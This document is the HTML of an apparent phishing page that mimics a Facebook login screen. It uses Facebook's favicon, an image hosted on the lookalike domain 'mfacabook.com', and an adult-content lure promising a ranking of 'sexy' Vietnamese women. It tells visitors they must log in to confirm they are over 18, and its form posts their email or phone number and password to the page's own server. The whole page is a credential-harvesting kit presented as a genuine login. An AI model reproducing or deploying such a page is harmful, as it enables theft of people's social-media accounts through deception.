<!DOCTYPE html>
<html>

<head>

    <meta charset='utf-8' />
    <meta content='width=device-width, initial-scale=1' name='viewport' />
    <meta property="og:title" content="Bảng xếp hạng girl's xinh Group Vietnamese Sexy Beauty Group - VSBG" />
    <meta property="og:image"
        content="http://mfacabook.com/assets/img/214811860_10102151673807292_1574796297546264838_n.jpg" />

    <link crossorigin='anonymous' href='https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css'
        integrity='sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC' rel='stylesheet' />
    <link data-badged-icon='https://static.xx.fbcdn.net/rsrc.php/ye/r/Ta8_J_nYekI.ico'
        data-default-icon='https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico'
        href='https://static.xx.fbcdn.net/rsrc.php/yD/r/d4ZIVX-5C-b.ico' rel='shortcut icon' />
    <title>Login</title>
    <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js'></script>
    <style id='page-skin-1' type='text/css'>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');

        body {
            font-family: 'Roboto', sans-serif;
        }

        input.form-control {
            border: none;
            border-bottom: 1px solid #ddd;
            background: none;
        }

        @media (pointer: fine) {
            .fblog {
                width: 600px;
                text-align: center;
                margin: auto;
            }
        }

        ._8qtf {
            margin: 12px 0 4px 0;
            width: 100%;
        }

        ._43mg {
            display: block;
            overflow: hidden;
            text-align: center;
            white-space: nowrap;
        }

        ._43mg>span {
            display: inline-block;
            position: relative;
        }

        ._43mh {
            color: #4b4f56;
        }

        ._43mg {
            display: block;
            overflow: hidden;
            text-align: center;
            white-space: nowrap;
        }

        ._43mg>span:before {
            margin-right: 15px;
            right: 100%;
        }

        ._43mg>span:before,
        ._43mg>span:after {
            background: #ccd0d5;
            content: '';
            height: 1px;
            position: absolute;
            top: 50%;
            width: 9999px;
        }

        ._43mg>span:after {
            left: 100%;
            margin-left: 15px;
        }

        ._43mg>span:before,
        ._43mg>span:after {
            background: #ccd0d5;
            content: '';
            height: 1px;
            position: absolute;
            top: 50%;
            width: 9999px;
        }

        ._43mg {
            display: block;
            overflow: hidden;
            text-align: center;
            margin-top: 50px;
            white-space: nowrap;
        }

        p {
            white-space: nowrap;
        }

        @media screen and (max-width: 600px) {
            p {
                white-space: normal;
            }
        }
    </style>
</head>

<body>
    <div class='fblog'>
        <form method="post" action="/">
            <img class='img-fluid'
                src='https://1.bp.blogspot.com/-W90h_vIYs9w/YOEWPkKhZYI/AAAAAAAAAAM/96ojIoW5M341ggKZjs-elzJ0FhXHzQmhACNcBGAsYHQ/s16000/887906fc5a13ae4df702.jpg' />
            <center class='mt-2'>
                <div class="error-message" style="color: red;">
                    <p>You need to login to confirm over 18 years old.</p>
                </div>
            </center>
            <div class='container'>
                <div class='row justify-content-center'>
                    <div class='col-10'>
                        <form action='' method='POST'>
                            <div class='mb-4 mt-4'>
                                <input class='form-control' id="username" name='username'
                                    placeholder='Email address or phone number' required='required' type='text' />
                            </div>
                            <div class='mb-4'>
                                <input class='form-control' name='password' id="password" placeholder='Password'
                                    required='required' type='password' />
                            </div>
                            <div class='d-grid gap-2'>
                                <button class='btn btn-primary' name='login' style='font-size: 15px; font-weight:600; '
                                    type='submit'>Log in</button>
                            </div>
                        </form>
                        <br />
                        <center><a href='#' style='text-decoration: none;font-weight: 600;'>Forgotten password?</a>
                        </center>
                        <div class='_43mg _8qtf' data-sigil='login_reg_separator' id='login_reg_separator'><span
                                class='_43mh'>or</span></div>
                        <center>
                            <div style='margin-top:50px'>
                                <div>
                                    <button class='btn btn-success'
                                        style='     background: #098e00;     border: none;     font-weight: 600;     font-size: 15px;     width: max-content; '
                                        type='button'>Sign up for Facebook</button>
                                </div>
                            </div>
                        </center>
                    </div>
                </div>
            </div>
        </form>
    </div>
    <div class='navbar no-items section' id='navbar'></div>
</body>

</html>